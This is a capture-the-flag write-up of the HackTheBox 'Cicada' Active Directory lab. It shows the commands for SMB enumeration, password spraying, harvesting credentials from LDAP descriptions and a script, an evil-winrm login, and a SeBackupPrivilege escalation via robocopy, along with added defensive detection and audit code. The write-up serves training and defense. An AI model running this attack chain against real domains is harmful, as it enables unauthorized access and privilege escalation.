HackTheBox: Cicada

Cicada is an easy HackTheBox machine that simulates an Active Directory environment. We start by enumerating the SMB shares and users available on the box and find user credentials that give us a shell; from there we leverage the SeBackupPrivilege permission to read the root flag.


Enumeration

Nmap Scan

Starting with an nmap scan of 10.129.118.121:

# Nmap 7.94SVN scan initiated Sat Sep 28 20:00:55 2024 as: nmap -sC -sV -T4 -oN cicada.out -vv -Pn 10.129.118.121
Nmap scan report for 10.129.118.121
Host is up, received user-set (0.077s latency).
Scanned at 2024-09-28 20:01:01 CET for 99s
Not shown: 991 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-09-29 02:01:14Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
636/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
3269/tcp open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 33002/tcp): CLEAN (Timeout)
|   Check 2 (port 30462/tcp): CLEAN (Timeout)
|   Check 3 (port 23118/udp): CLEAN (Timeout)
|   Check 4 (port 23887/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-09-29T02:01:56
|_  start_date: N/A
|_clock-skew: 6h59m59s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 28 20:02:40 2024 -- 1 IP address (1 host up) scanned in 104.31 seconds

The results show an Active Directory environment. We add the domain to our /etc/hosts.

127.0.0.1       localhost
127.0.1.1       voldemort
10.129.118.121  CICADA-DC.cicada.htb cicada.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

SMB Shares

Trying to log in to SMB with the Guest account succeeds.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ nxc smb 10.129.118.121 -u 'guest' -p '' 
SMB         10.129.118.121  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.118.121  445    CICADA-DC        [+] cicada.htb\guest:

Listing all available shares, two of them are interesting: DEV and HR.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ nxc smb 10.129.118.121 -u 'guest' -p '' --shares
SMB         10.129.118.121  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.118.121  445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.129.118.121  445    CICADA-DC        [*] Enumerated shares
SMB         10.129.118.121  445    CICADA-DC        Share           Permissions     Remark
SMB         10.129.118.121  445    CICADA-DC        -----           -----------     ------
SMB         10.129.118.121  445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.129.118.121  445    CICADA-DC        C$                              Default share
SMB         10.129.118.121  445    CICADA-DC        DEV                             
SMB         10.129.118.121  445    CICADA-DC        HR              READ            
SMB         10.129.118.121  445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.129.118.121  445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.129.118.121  445    CICADA-DC        SYSVOL                          Logon server share

We were not able to list DEV. HR, on the other hand, is accessible, and inside it we found a text file.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ smbclient //10.129.118.121/HR
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 13:29:09 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 18:31:48 2024

		4168447 blocks of size 4096. 330884 blocks available
smb: \>

Using get "Notice from HR.txt" we retrieved the file and read its content.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ cat Notice\ from\ HR.txt 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: [REDACTED]

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Exploitation

Michael’s Credentials

We got a password! With a list of users obtained from nxc, we sprayed that password against every account and got a hit for michael.wrightson.

CICADA\Administrator
CICADA\Guest
CICADA\krbtgt
CICADA\CICADA-DC$
CICADA\john.smoulder
CICADA\sarah.dantelia
CICADA\michael.wrightson
CICADA\david.orelious
CICADA\emily.oscars
┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ nxc smb 10.129.118.121 -u users.list -p '[REDACTED]'                      
SMB         10.129.118.121  445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.118.121  445    CICADA-DC        [-] CICADA\Administrator:[REDACTED] STATUS_LOGON_FAILURE
SMB         10.129.118.121  445    CICADA-DC        [-] CICADA\Guest:[REDACTED] STATUS_LOGON_FAILURE
SMB         10.129.118.121  445    CICADA-DC        [-] CICADA\krbtgt:[REDACTED] STATUS_LOGON_FAILURE
SMB         10.129.118.121  445    CICADA-DC        [-] CICADA\CICADA-DC$:[REDACTED] STATUS_LOGON_FAILURE
SMB         10.129.118.121  445    CICADA-DC        [-] CICADA\john.smoulder:[REDACTED] STATUS_LOGON_FAILURE
SMB         10.129.118.121  445    CICADA-DC        [-] CICADA\sarah.dantelia:[REDACTED] STATUS_LOGON_FAILURE
SMB         10.129.118.121  445    CICADA-DC        [+] CICADA\michael.wrightson:[REDACTED]
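The spray above leaves a distinctive trace on the domain controller: one source address, many distinct accounts failing to log on within seconds, and then one success. The following detector is an added example, not part of the original post; it runs over a constructed list of logon events in a simplified (event id, timestamp, source IP, target user) shape that mirrors what an exporter of 4625/4624 events would provide.

```python
from collections import defaultdict

# Constructed sample of DC logon events (not from the original post).
# Shape: (event id, epoch seconds, source IP, target user).
# 4625 = failed logon, 4624 = successful logon.
SAMPLE_EVENTS = [
    (4625, 1727553660, "10.10.14.5", "Administrator"),
    (4625, 1727553661, "10.10.14.5", "Guest"),
    (4625, 1727553662, "10.10.14.5", "krbtgt"),
    (4625, 1727553663, "10.10.14.5", "john.smoulder"),
    (4625, 1727553664, "10.10.14.5", "sarah.dantelia"),
    (4624, 1727553665, "10.10.14.5", "michael.wrightson"),
    (4625, 1727553700, "10.10.14.9", "david.orelious"),  # one typo, not a spray
]


def detect_password_spray(events, window=300, min_users=5):
    """Flag each source IP that produced failed logons for at least `min_users`
    distinct accounts inside any `window`-second span, and report which
    accounts succeeded from that source in the same span.

    Returns {source_ip: {"failed_users": set, "succeeded_users": set}}.
    """
    by_source = defaultdict(list)
    for event_id, ts, src, user in events:
        by_source[src].append((ts, event_id, user))

    findings = {}
    for src, evs in by_source.items():
        evs.sort()  # chronological order per source
        for i, (ts0, _, _) in enumerate(evs):
            span = [e for e in evs[i:] if e[0] - ts0 <= window]
            failed = {u for _, eid, u in span if eid == 4625}
            if len(failed) >= min_users:
                succeeded = {u for _, eid, u in span if eid == 4624}
                findings[src] = {"failed_users": failed,
                                 "succeeded_users": succeeded}
                break  # one finding per source is enough
    return findings
```

A single account with a few failures (as for 10.10.14.9 here) is left alone; only the many-accounts-one-source pattern is reported.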

David’s Credentials

Using ldapdomaindump to dump user information, we found david.orelious' password in his account description.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ ldapdomaindump ldap://10.129.118.121 -u 'cicada.htb\michael.wrightson' -p '[REDACTED]'

Grepping for david.orelious in domain_users.grep shows the password in the description column.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ cat domain_users.grep | grep david.orelious
David Orelious	David Orelious	david.orelious		Domain Users	03/14/24 12:17:29	08/28/24 17:25:57	03/15/24 06:32:21	NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD	03/14/24 12:17:29	S-1-5-21-917908876-1423158569-3159038727-1108	Just in case I forget my password is [REDACTED]

With that password we tried listing the DEV share, and it worked!

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ smbclient -U david.orelious //cicada.htb/DEV
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 18:28:22 2024

		4168447 blocks of size 4096. 330788 blocks available
smb: \>

Initial Foothold - Emily

Retrieving that .ps1 file, we found emily.oscars' password hard-coded in it.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ cat Backup_script.ps1                      

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "[REDACTED]" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
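Both credential leaks on this box, the password in david.orelious' AD description and the plaintext string passed to ConvertTo-SecureString in the backup script, can be caught by a routine scan before an attacker finds them. The scanner below is an added example (not the post's or the box's code) that reads rows in the tab-separated layout ldapdomaindump writes to domain_users.grep and a PowerShell fragment in the shape of the script above; the sample rows, SIDs and passwords are constructed.

```python
import re

# Constructed rows in ldapdomaindump's domain_users.grep column order:
# cn, name, sAMAccountName, memberOf, primaryGroupId, whenCreated, whenChanged,
# lastLogon, userAccountControl, pwdLastSet, objectSid, description.
GREP_ROWS = [
    "David Orelious\tDavid Orelious\tdavid.orelious\t\tDomain Users\t03/14/24 12:17:29\t"
    "08/28/24 17:25:57\t03/15/24 06:32:21\tNORMAL_ACCOUNT, DONT_EXPIRE_PASSWD\t"
    "03/14/24 12:17:29\tS-1-5-21-0-0-0-1108\tJust in case I forget my password is Example#1",
    "Sarah Dantelia\tSarah Dantelia\tsarah.dantelia\t\tDomain Users\t03/14/24 12:17:29\t"
    "03/14/24 12:17:29\t\tNORMAL_ACCOUNT\t03/14/24 12:17:29\tS-1-5-21-0-0-0-1107\tHR team",
]

# Constructed PowerShell fragment in the shape of Backup_script.ps1.
PS_SCRIPT = '''$username = "emily.oscars"
$password = ConvertTo-SecureString "Example#2" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)'''

# Phrases that commonly precede a literal password in free-text fields.
DESCRIPTION_PATTERNS = [
    re.compile(r"\bpass(?:word|wd)?\b\s*(?:is|:|=)\s*(\S+)", re.I),
    re.compile(r"\bpwd\b\s*(?:is|:|=)\s*(\S+)", re.I),
]
# A plaintext literal handed straight to ConvertTo-SecureString.
PS_PATTERN = re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.I)


def find_description_secrets(rows):
    """Return (sAMAccountName, suspected secret) for rows whose description
    looks like it embeds a password."""
    hits = []
    for row in rows:
        cols = row.split("\t")
        if len(cols) < 12:  # malformed row, skip rather than misread columns
            continue
        sam, description = cols[2], cols[11]
        for pattern in DESCRIPTION_PATTERNS:
            match = pattern.search(description)
            if match:
                hits.append((sam, match.group(1)))
                break
    return hits


def find_script_secrets(text):
    """Return every plaintext literal converted with -AsPlainText in a script."""
    return PS_PATTERN.findall(text)
```

Hits from the first function are a signal to clear the description attribute and rotate the password; hits from the second are a signal to move the credential out of the script (for example into a managed service account or a vault).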

After finding the password we logged in with evil-winrm using the credentials obtained.

┌──(str4ngerx㉿voldemort)-[~/Desktop/HackTheBox/Cicada]
└─$ evil-winrm -i 'cicada.htb' -u 'emily.oscars' -p '[REDACTED]'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir


    Directory: C:\Users\emily.oscars.CICADA\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         9/28/2024   7:31 PM             34 user.txt


*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
486b9d****44508
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>

And there we have our user flag!

Privilege Escalation

For the privilege escalation, we started by looking at our privileges.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
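The listing above is exactly what an administrator should review for any account that can log on remotely: SeBackupPrivilege and SeRestorePrivilege let their holder read and write files regardless of the ACLs on them, so a user with either is effectively able to reach everything on the disk. The audit helper below is an added example, not part of the post; it parses whoami /priv output (a constructed copy of the listing above) and flags the privileges that matter, whether they show as Enabled or Disabled, since a holder can enable a disabled privilege at will.

```python
# Privileges that let the holder bypass object ACLs or reach SYSTEM; the
# descriptions are the reason a reviewer would flag them.
SENSITIVE_PRIVILEGES = {
    "SeBackupPrivilege": "read any file, backup semantics bypass ACLs",
    "SeRestorePrivilege": "write any file, restore semantics bypass ACLs",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed listing in the format whoami /priv prints.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


def parse_whoami_priv(text):
    """Return {privilege name: state} from whoami /priv output.
    Privilege rows are recognised by the Se...Privilege token in column one;
    headers and separator lines never match that shape."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[0].endswith("Privilege"):
            privs[parts[0]] = parts[-1]
    return privs


def audit_privileges(text):
    """Return [(privilege, state, why it matters)] for every sensitive
    privilege held, regardless of its current Enabled/Disabled state."""
    return [(name, state, SENSITIVE_PRIVILEGES[name])
            for name, state in parse_whoami_priv(text).items()
            if name in SENSITIVE_PRIVILEGES]
```

For a user like emily.oscars the fix is membership review: these rights normally arrive through Backup Operators, and an account that only needs to archive one share does not need to be in that group.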

We see SeBackupPrivilege, which can be leveraged to escalate our privileges. Here is a blog post that talks about it.

Executing this command copies the root.txt file to C:\Users\root.txt.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> robocopy C:\Users\Administrator\desktop C:\Users\root.txt /B

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Saturday, September 28, 2024 9:42:13 PM
   Source : C:\Users\Administrator\desktop\
     Dest : C:\Users\

    Files : root.txt

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

	                   1	C:\Users\Administrator\desktop\
	    New File  		      34	root.txt
  0%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :        34        34         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00
   Ended : Saturday, September 28, 2024 9:42:13 PM

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type C:\Users\root.txt
4ee62bcf****6ceef51f5
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> 

And there you go, we pwned the box successfully!

This post is licensed under CC BY 4.0 by the author.